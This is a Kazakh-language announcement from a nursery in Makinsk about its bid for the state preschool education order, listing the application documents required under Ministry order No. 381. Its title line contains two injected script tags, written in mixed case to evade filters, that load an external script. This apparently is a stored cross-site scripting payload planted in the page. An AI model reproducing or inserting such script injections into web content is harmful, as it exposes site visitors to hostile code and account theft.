Мектепке дейінгі тәрбие мен оқытуға мемлекеттік білім беру тапсырысына қатысу туралы хабарландыру.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

27.11.2023

Мектепке дейінгі тәрбие мен оқытуға мемлекеттік білім беру тапсырысына қатысу туралы хабарландыру.

 

«Ақмола облысы білім басқармасының Бұланды ауданы бойынша білім бөлімінің жанындағы Макинск қаласының «Балдырған» бөбекжайы» МКҚК-ы Мектепке дейінгі тәрбие мен оқытуға мемлекеттік білім беру тапсырысына қатысып жатқанымызды хабарлаймыз.

       Мектепке дейінгі тәрбие мен оқытуға мемлекеттік білім беру тапсырысын алуға конкурстық рәсімге қатысу үшін Қазақстан Республикасы Оқу-ағарту министрінің 2022 жылғы 27 тамыздағы № 381 бұйрығына 14 тармағына сәйкес  төмендегідей құжаттар жинастырылу барысында:

       1) осы Қағидаларға 1-қосымшаға сәйкес нысан бойынша өтініш;

      2) мектепке дейінгі ұйым басшысының қолымен және мөрімен расталған бейнебақылау камераларының, дабыл түймешесінің және дауыстық хабарландырудың бар болуы жөнінде ақпарат;

      3) Санитариялық қағидаларға сәйкес тәрбиеленушілерді (сыйымдылығы үш топқа дейін болған кезде) медициналық қамтамасыз етуді жүзеге асыруға арналған бастапқы медициналық-санитариялық көмек көрсету аумақтық ұйымымен шарт;

      4) штаттық кестенің және педагогикалық немесе бейіндік білімі бар педагогтердің белгіленген үлгідегі білім туралы құжаттарының көшірмелері;

      5) ғимаратты/үй-жайды жалдау шартының көшермесі (бар болса).

 

Қазақстан Республикасы Оқу-ағарту министрінің 2022 жылғы 27 тамыздағы № 381 бұйрығының  14-тармағында көрсетілген құжаттарды ұсынғаннан кейін Комиссия мемлекеттік электрондық ақпараттық жүйелер ("электрондық үкіметтің" веб-порталы арқылы www.egov.kz, www.elicense.kz) арқылы мынадай құжаттардың барын және жарамдылығын тексеруді жүзеге асырады:

       1) "Рұқсаттар және хабарламалар туралы" Қазақстан Республикасының Заңына (бұдан әрі – Рұқсаттар және хабарламалар туралы Заң) сәйкес мектепке дейінгі тәрбие және оқыту саласындағы қызметтің басталғаны немесе тоқтатылғаны туралы хабарламалар;

      2) медициналық қызметке лицензиялар;

      3) Қазақстан Республикасының заңнамасына сәйкес заңды тұлғаны немесе жеке кәсіпкерді мемлекеттік тіркеу/қайта тіркеу туралы анықтамалар, жылжымайтын мүлікке тіркелген құқықтар (ауыртпалықтар) және оның техникалық сипаттамалары туралы анықтамалар;

       4) "Қазақстан Республикасы ұлттық қауіпсіздік органдарының объектілеріндегі эпидемиялық мәні жоғары объектінің халықтың санитариялық-эпидемиологиялық саламаттылығы саласындағы нормативтік құқықтық актілерге сәйкестігі туралы санитариялық-эпидемиологиялық қорытынды беру мемлекеттік қызметін көрсету қағидаларын бекіту туралы" Қазақстан Республикасы Ұлттық қауіпсіздік комитеті Төрағасының 2022 жылғы 21 маусымдағы № 29/қе бұйрығына (Қазақстан Республикасы Ұлттық қауіпсіздік органдарының нормативтік құқықтық актілерді тіркеу № 28566 тізілімінде болып тіркелген) сәйкес мектепке дейінгі ұйымның санитариялық-эпидемиологиялық талаптарға сәйкестігі туралы санитариялық-эпидемиологиялық қорытынды (бұдан әрі - № 29/қе бұйрық);

      5) Конкурсқа құжаттарды тапсырғанға дейін бір айдан аспайтын мерзімде мемлекеттік кірістер органдарында жүргізілетін есеп бойынша берешегінің жоқ (бар) екені туралы мәліметтер.

 

Просмотров: 380


Пікір қосу



Деректерді қолтаңбаға қосу